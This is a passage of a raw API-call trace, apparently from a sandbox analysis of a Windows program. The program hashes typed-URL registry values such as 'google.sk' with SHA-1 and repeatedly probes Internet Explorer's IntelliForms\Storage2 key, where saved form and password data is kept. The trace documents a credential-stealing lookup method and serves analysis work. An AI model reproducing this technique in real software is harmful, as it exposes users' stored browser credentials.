(lpString="D8") returned 2 [0249.350] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd217630 [0249.350] lstrcpyW (in: lpString1=0xd217630, lpString2="6D26DBF7C15D0B3B1700" | out: lpString1="6D26DBF7C15D0B3B1700") returned="6D26DBF7C15D0B3B1700" [0249.350] lstrcatW (in: lpString1="6D26DBF7C15D0B3B1700", lpString2="D8" | out: lpString1="6D26DBF7C15D0B3B1700D8") returned="6D26DBF7C15D0B3B1700D8" [0249.350] LocalFree (hMem=0xd2168b0) returned 0x0 [0249.350] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="AA") returned 2 [0249.350] lstrlenW (lpString="6D26DBF7C15D0B3B1700D8") returned 22 [0249.350] lstrlenW (lpString="AA") returned 2 [0249.350] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd217570 [0249.350] lstrcpyW (in: lpString1=0xd217570, lpString2="6D26DBF7C15D0B3B1700D8" | out: lpString1="6D26DBF7C15D0B3B1700D8") returned="6D26DBF7C15D0B3B1700D8" [0249.350] lstrcatW (in: lpString1="6D26DBF7C15D0B3B1700D8", lpString2="AA" | out: lpString1="6D26DBF7C15D0B3B1700D8AA") returned="6D26DBF7C15D0B3B1700D8AA" [0249.350] LocalFree (hMem=0xd217630) returned 0x0 [0249.350] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="9B") returned 2 [0249.350] lstrlenW (lpString="6D26DBF7C15D0B3B1700D8AA") returned 24 [0249.350] lstrlenW (lpString="9B") returned 2 [0249.350] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd217030 [0249.350] lstrcpyW (in: lpString1=0xd217030, lpString2="6D26DBF7C15D0B3B1700D8AA" | out: lpString1="6D26DBF7C15D0B3B1700D8AA") returned="6D26DBF7C15D0B3B1700D8AA" [0249.351] lstrcatW (in: lpString1="6D26DBF7C15D0B3B1700D8AA", lpString2="9B" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B") returned="6D26DBF7C15D0B3B1700D8AA9B" [0249.351] LocalFree (hMem=0xd217570) returned 0x0 [0249.351] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="35") returned 2 [0249.351] lstrlenW (lpString="6D26DBF7C15D0B3B1700D8AA9B") returned 26 [0249.351] lstrlenW (lpString="35") returned 2 [0249.351] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd215020 [0249.351] lstrcpyW (in: lpString1=0xd215020, lpString2="6D26DBF7C15D0B3B1700D8AA9B" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B") returned="6D26DBF7C15D0B3B1700D8AA9B" [0249.351] lstrcatW (in: lpString1="6D26DBF7C15D0B3B1700D8AA9B", lpString2="35" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35") returned="6D26DBF7C15D0B3B1700D8AA9B35" [0249.351] LocalFree (hMem=0xd217030) returned 0x0 [0249.351] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E4") returned 2 [0249.351] lstrlenW (lpString="6D26DBF7C15D0B3B1700D8AA9B35") returned 28 [0249.351] lstrlenW (lpString="E4") returned 2 [0249.351] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd216540 [0249.351] lstrcpyW (in: lpString1=0xd216540, lpString2="6D26DBF7C15D0B3B1700D8AA9B35" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35") returned="6D26DBF7C15D0B3B1700D8AA9B35" [0249.351] lstrcatW (in: lpString1="6D26DBF7C15D0B3B1700D8AA9B35", lpString2="E4" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E4") returned="6D26DBF7C15D0B3B1700D8AA9B35E4" [0249.351] LocalFree (hMem=0xd215020) returned 0x0 [0249.351] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="26") returned 2 [0249.351] lstrlenW (lpString="6D26DBF7C15D0B3B1700D8AA9B35E4") returned 30 [0249.351] lstrlenW (lpString="26") returned 2 [0249.351] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd214b40 [0249.351] lstrcpyW (in: lpString1=0xd214b40, lpString2="6D26DBF7C15D0B3B1700D8AA9B35E4" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E4") returned="6D26DBF7C15D0B3B1700D8AA9B35E4" [0249.351] lstrcatW (in: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E4", lpString2="26" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426") returned="6D26DBF7C15D0B3B1700D8AA9B35E426" [0249.351] LocalFree (hMem=0xd216540) returned 0x0 [0249.351] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F3") returned 2 [0249.351] lstrlenW (lpString="6D26DBF7C15D0B3B1700D8AA9B35E426") returned 32 [0249.351] lstrlenW (lpString="F3") returned 2 [0249.351] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd2155d0 [0249.351] lstrcpyW (in: lpString1=0xd2155d0, lpString2="6D26DBF7C15D0B3B1700D8AA9B35E426" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426") returned="6D26DBF7C15D0B3B1700D8AA9B35E426" [0249.351] lstrcatW (in: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426", lpString2="F3" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3") returned="6D26DBF7C15D0B3B1700D8AA9B35E426F3" [0249.351] LocalFree (hMem=0xd214b40) returned 0x0 [0249.351] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E4") returned 2 [0249.351] lstrlenW (lpString="6D26DBF7C15D0B3B1700D8AA9B35E426F3") returned 34 [0249.351] lstrlenW (lpString="E4") returned 2 [0249.351] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d66ce0 [0249.351] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="6D26DBF7C15D0B3B1700D8AA9B35E426F3" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3") returned="6D26DBF7C15D0B3B1700D8AA9B35E426F3" [0249.352] lstrcatW (in: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3", lpString2="E4" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4") returned="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4" [0249.352] LocalFree (hMem=0xd2155d0) returned 0x0 [0249.352] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F4") returned 2 [0249.352] lstrlenW (lpString="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4") returned 36 [0249.352] lstrlenW (lpString="F4") returned 2 [0249.352] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d67e60 [0249.352] lstrcpyW (in: lpString1=0x5d67e60, lpString2="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4") returned="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4" [0249.352] lstrcatW (in: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4", lpString2="F4" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4") returned="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4" [0249.352] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.352] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C4") returned 2 [0249.352] lstrlenW (lpString="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4") returned 38 [0249.352] lstrlenW (lpString="C4") returned 2 [0249.352] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d66ce0 [0249.352] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4") returned="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4" [0249.352] lstrcatW (in: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4", lpString2="C4" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4C4") returned="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4C4" [0249.352] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.352] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="CB") returned 2 [0249.352] lstrlenW (lpString="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4C4") returned 40 [0249.352] lstrlenW (lpString="CB") returned 2 [0249.352] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67220 [0249.352] lstrcpyW (in: lpString1=0x5d67220, lpString2="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4C4" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4C4") returned="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4C4" [0249.352] lstrcatW (in: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4C4", lpString2="CB" | out: lpString1="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4C4CB") returned="6D26DBF7C15D0B3B1700D8AA9B35E426F3E4F4C4CB" [0249.352] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.352] CryptDestroyHash (hHash=0x5d9d8a0) returned 1 [0249.352] CryptReleaseContext (hProv=0x5d36f10, dwFlags=0x0) returned 1 [0249.352] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.352] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.352] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.352] LocalFree (hMem=0x5d67220) returned 0x0 [0249.352] RegEnumValueW (in: hKey=0x94c, dwIndex=0x5, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url18", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.352] StrStrIW (lpFirst="google.sk", lpSrch="?") returned 0x0 [0249.352] StrStrIW (lpFirst="google.sk", lpSrch="http://") returned 0x0 [0249.353] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d37210) returned 1 [0249.353] CryptCreateHash (in: hProv=0x5d37210, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.353] lstrlenW (lpString="google.sk") returned 9 [0249.353] CryptHashData (hHash=0x5d9e550, pbData=0x43ed4e0, dwDataLen=0x14, dwFlags=0x0) returned 1 [0249.353] CryptGetHashParam (in: hHash=0x5d9e550, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.353] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="7F") returned 2 [0249.353] lstrlenW (lpString="") returned 0 [0249.353] lstrlenW (lpString="7F") returned 2 [0249.353] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b3410 [0249.353] lstrcpyW (in: lpString1=0xd1b3410, lpString2="" | out: lpString1="") returned="" [0249.353] lstrcatW (in: lpString1="", lpString2="7F" | out: lpString1="7F") returned="7F" [0249.353] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="9A") returned 2 [0249.353] lstrlenW (lpString="7F") returned 2 [0249.353] lstrlenW (lpString="9A") returned 2 [0249.353] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33770 [0249.353] lstrcpyW (in: lpString1=0x5d33770, lpString2="7F" | out: lpString1="7F") returned="7F" [0249.353] lstrcatW (in: lpString1="7F", lpString2="9A" | out: lpString1="7F9A") returned="7F9A" [0249.353] LocalFree (hMem=0xd1b3410) returned 0x0 [0249.353] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="88") returned 2 [0249.353] lstrlenW (lpString="7F9A") returned 4 [0249.353] lstrlenW (lpString="88") returned 2 [0249.353] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33950 [0249.353] lstrcpyW (in: lpString1=0x5d33950, lpString2="7F9A" | out: lpString1="7F9A") returned="7F9A" [0249.353] lstrcatW (in: lpString1="7F9A", lpString2="88" | out: lpString1="7F9A88") returned="7F9A88" [0249.353] LocalFree (hMem=0x5d33770) returned 0x0 [0249.353] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="7D") returned 2 [0249.353] lstrlenW (lpString="7F9A88") returned 6 [0249.353] lstrlenW (lpString="7D") returned 2 [0249.353] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33770 [0249.353] lstrcpyW (in: lpString1=0x5d33770, lpString2="7F9A88" | out: lpString1="7F9A88") returned="7F9A88" [0249.353] lstrcatW (in: lpString1="7F9A88", lpString2="7D" | out: lpString1="7F9A887D") returned="7F9A887D" [0249.353] LocalFree (hMem=0x5d33950) returned 0x0 [0249.353] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="02") returned 2 [0249.353] lstrlenW (lpString="7F9A887D") returned 8 [0249.354] lstrlenW (lpString="02") returned 2 [0249.354] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33950 [0249.354] lstrcpyW (in: lpString1=0x5d33950, lpString2="7F9A887D" | out: lpString1="7F9A887D") returned="7F9A887D" [0249.354] lstrcatW (in: lpString1="7F9A887D", lpString2="02" | out: lpString1="7F9A887D02") returned="7F9A887D02" [0249.354] LocalFree (hMem=0x5d33770) returned 0x0 [0249.354] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="11") returned 2 [0249.354] lstrlenW (lpString="7F9A887D02") returned 10 [0249.354] lstrlenW (lpString="11") returned 2 [0249.354] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d0700 [0249.354] lstrcpyW (in: lpString1=0xd1d0700, lpString2="7F9A887D02" | out: lpString1="7F9A887D02") returned="7F9A887D02" [0249.354] lstrcatW (in: lpString1="7F9A887D02", lpString2="11" | out: lpString1="7F9A887D0211") returned="7F9A887D0211" [0249.354] LocalFree (hMem=0x5d33950) returned 0x0 [0249.354] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="02") returned 2 [0249.354] lstrlenW (lpString="7F9A887D0211") returned 12 [0249.354] lstrlenW (lpString="02") returned 2 [0249.354] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d0020 [0249.354] lstrcpyW (in: lpString1=0xd1d0020, lpString2="7F9A887D0211" | out: lpString1="7F9A887D0211") returned="7F9A887D0211" [0249.354] lstrcatW (in: lpString1="7F9A887D0211", lpString2="02" | out: lpString1="7F9A887D021102") returned="7F9A887D021102" [0249.354] LocalFree (hMem=0xd1d0700) returned 0x0 [0249.354] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="81") returned 2 [0249.354] lstrlenW (lpString="7F9A887D021102") returned 14 [0249.354] lstrlenW (lpString="81") returned 2 [0249.354] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d0ff0 [0249.354] lstrcpyW (in: lpString1=0xd1d0ff0, lpString2="7F9A887D021102" | out: lpString1="7F9A887D021102") returned="7F9A887D021102" [0249.354] lstrcatW (in: lpString1="7F9A887D021102", lpString2="81" | out: lpString1="7F9A887D02110281") returned="7F9A887D02110281" [0249.354] LocalFree (hMem=0xd1d0020) returned 0x0 [0249.354] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="CD") returned 2 [0249.354] lstrlenW (lpString="7F9A887D02110281") returned 16 [0249.354] lstrlenW (lpString="CD") returned 2 [0249.354] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d05a0 [0249.354] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="7F9A887D02110281" | out: lpString1="7F9A887D02110281") returned="7F9A887D02110281" [0249.354] lstrcatW (in: lpString1="7F9A887D02110281", lpString2="CD" | out: lpString1="7F9A887D02110281CD") returned="7F9A887D02110281CD" [0249.354] LocalFree (hMem=0xd1d0ff0) returned 0x0 [0249.354] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="12") returned 2 [0249.354] lstrlenW (lpString="7F9A887D02110281CD") returned 18 [0249.354] lstrlenW (lpString="12") returned 2 [0249.354] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd2177b0 [0249.354] lstrcpyW (in: lpString1=0xd2177b0, lpString2="7F9A887D02110281CD" | out: lpString1="7F9A887D02110281CD") returned="7F9A887D02110281CD" [0249.354] lstrcatW (in: lpString1="7F9A887D02110281CD", lpString2="12" | out: lpString1="7F9A887D02110281CD12") returned="7F9A887D02110281CD12" [0249.354] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.354] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A9") returned 2 [0249.354] lstrlenW (lpString="7F9A887D02110281CD12") returned 20 [0249.354] lstrlenW (lpString="A9") returned 2 [0249.354] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd2180b0 [0249.354] lstrcpyW (in: lpString1=0xd2180b0, lpString2="7F9A887D02110281CD12" | out: lpString1="7F9A887D02110281CD12") returned="7F9A887D02110281CD12" [0249.354] lstrcatW (in: lpString1="7F9A887D02110281CD12", lpString2="A9" | out: lpString1="7F9A887D02110281CD12A9") returned="7F9A887D02110281CD12A9" [0249.354] LocalFree (hMem=0xd2177b0) returned 0x0 [0249.355] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="CD") returned 2 [0249.355] lstrlenW (lpString="7F9A887D02110281CD12A9") returned 22 [0249.355] lstrlenW (lpString="CD") returned 2 [0249.355] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd217030 [0249.355] lstrcpyW (in: lpString1=0xd217030, lpString2="7F9A887D02110281CD12A9" | out: lpString1="7F9A887D02110281CD12A9") returned="7F9A887D02110281CD12A9" [0249.355] lstrcatW (in: lpString1="7F9A887D02110281CD12A9", lpString2="CD" | out: lpString1="7F9A887D02110281CD12A9CD") returned="7F9A887D02110281CD12A9CD" [0249.355] LocalFree (hMem=0xd2180b0) returned 0x0 [0249.355] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="16") returned 2 [0249.355] lstrlenW (lpString="7F9A887D02110281CD12A9CD") returned 24 [0249.355] lstrlenW (lpString="16") returned 2 [0249.355] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd2177b0 [0249.355] lstrcpyW (in: lpString1=0xd2177b0, lpString2="7F9A887D02110281CD12A9CD" | out: lpString1="7F9A887D02110281CD12A9CD") returned="7F9A887D02110281CD12A9CD" [0249.355] lstrcatW (in: lpString1="7F9A887D02110281CD12A9CD", lpString2="16" | out: lpString1="7F9A887D02110281CD12A9CD16") returned="7F9A887D02110281CD12A9CD16" [0249.355] LocalFree (hMem=0xd217030) returned 0x0 [0249.355] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="CF") returned 2 [0249.355] lstrlenW (lpString="7F9A887D02110281CD12A9CD16") returned 26 [0249.355] lstrlenW (lpString="CF") returned 2 [0249.355] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd214ce0 [0249.355] lstrcpyW (in: lpString1=0xd214ce0, lpString2="7F9A887D02110281CD12A9CD16" | out: lpString1="7F9A887D02110281CD12A9CD16") returned="7F9A887D02110281CD12A9CD16" [0249.355] lstrcatW (in: lpString1="7F9A887D02110281CD12A9CD16", lpString2="CF" | out: lpString1="7F9A887D02110281CD12A9CD16CF") returned="7F9A887D02110281CD12A9CD16CF" [0249.355] LocalFree (hMem=0xd2177b0) returned 0x0 [0249.355] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="DA") returned 2 [0249.355] lstrlenW (lpString="7F9A887D02110281CD12A9CD16CF") returned 28 [0249.355] lstrlenW (lpString="DA") returned 2 [0249.355] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd214f50 [0249.355] lstrcpyW (in: lpString1=0xd214f50, lpString2="7F9A887D02110281CD12A9CD16CF" | out: lpString1="7F9A887D02110281CD12A9CD16CF") returned="7F9A887D02110281CD12A9CD16CF" [0249.355] lstrcatW (in: lpString1="7F9A887D02110281CD12A9CD16CF", lpString2="DA" | out: lpString1="7F9A887D02110281CD12A9CD16CFDA") returned="7F9A887D02110281CD12A9CD16CFDA" [0249.355] LocalFree (hMem=0xd214ce0) returned 0x0 [0249.355] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EE") returned 2 [0249.355] lstrlenW (lpString="7F9A887D02110281CD12A9CD16CFDA") returned 30 [0249.355] lstrlenW (lpString="EE") returned 2 [0249.355] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd215b80 [0249.355] lstrcpyW (in: lpString1=0xd215b80, lpString2="7F9A887D02110281CD12A9CD16CFDA" | out: lpString1="7F9A887D02110281CD12A9CD16CFDA") returned="7F9A887D02110281CD12A9CD16CFDA" [0249.355] lstrcatW (in: lpString1="7F9A887D02110281CD12A9CD16CFDA", lpString2="EE" | out: lpString1="7F9A887D02110281CD12A9CD16CFDAEE") returned="7F9A887D02110281CD12A9CD16CFDAEE" [0249.355] LocalFree (hMem=0xd214f50) returned 0x0 [0249.355] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A3") returned 2 [0249.355] lstrlenW (lpString="7F9A887D02110281CD12A9CD16CFDAEE") returned 32 [0249.355] lstrlenW (lpString="A3") returned 2 [0249.355] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd214660 [0249.355] lstrcpyW (in: lpString1=0xd214660, lpString2="7F9A887D02110281CD12A9CD16CFDAEE" | out: lpString1="7F9A887D02110281CD12A9CD16CFDAEE") returned="7F9A887D02110281CD12A9CD16CFDAEE" [0249.355] lstrcatW (in: lpString1="7F9A887D02110281CD12A9CD16CFDAEE", lpString2="A3" | out: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3") returned="7F9A887D02110281CD12A9CD16CFDAEEA3" [0249.355] LocalFree (hMem=0xd215b80) returned 0x0 [0249.355] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="DC") returned 2 [0249.355] lstrlenW (lpString="7F9A887D02110281CD12A9CD16CFDAEEA3") returned 34 [0249.356] lstrlenW (lpString="DC") returned 2 [0249.356] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d66960 [0249.356] lstrcpyW (in: lpString1=0x5d66960, lpString2="7F9A887D02110281CD12A9CD16CFDAEEA3" | out: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3") returned="7F9A887D02110281CD12A9CD16CFDAEEA3" [0249.356] lstrcatW (in: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3", lpString2="DC" | out: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3DC") returned="7F9A887D02110281CD12A9CD16CFDAEEA3DC" [0249.356] LocalFree (hMem=0xd214660) returned 0x0 [0249.356] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B2") returned 2 [0249.356] lstrlenW (lpString="7F9A887D02110281CD12A9CD16CFDAEEA3DC") returned 36 [0249.356] lstrlenW (lpString="B2") returned 2 [0249.356] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d67220 [0249.356] lstrcpyW (in: lpString1=0x5d67220, lpString2="7F9A887D02110281CD12A9CD16CFDAEEA3DC" | out: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3DC") returned="7F9A887D02110281CD12A9CD16CFDAEEA3DC" [0249.356] lstrcatW (in: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3DC", lpString2="B2" | out: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2") returned="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2" [0249.356] LocalFree (hMem=0x5d66960) returned 0x0 [0249.356] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B2") returned 2 [0249.356] lstrlenW (lpString="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2") returned 38 [0249.356] lstrlenW (lpString="B2") returned 2 [0249.356] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67300 [0249.356] lstrcpyW (in: lpString1=0x5d67300, lpString2="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2" | out: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2") returned="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2" [0249.356] lstrcatW (in: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2", lpString2="B2" | out: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2B2") returned="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2B2" [0249.356] LocalFree (hMem=0x5d67220) returned 0x0 [0249.356] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="99") returned 2 [0249.356] lstrlenW (lpString="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2B2") returned 40 [0249.356] lstrlenW (lpString="99") returned 2 [0249.356] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d667a0 [0249.356] lstrcpyW (in: lpString1=0x5d667a0, lpString2="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2B2" | out: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2B2") returned="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2B2" [0249.356] lstrcatW (in: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2B2", lpString2="99" | out: lpString1="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2B299") returned="7F9A887D02110281CD12A9CD16CFDAEEA3DCB2B299" [0249.356] LocalFree (hMem=0x5d67300) returned 0x0 [0249.356] CryptDestroyHash (hHash=0x5d9e550) returned 1 [0249.356] CryptReleaseContext (hProv=0x5d37210, dwFlags=0x0) returned 1 [0249.356] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.356] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.356] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.356] LocalFree 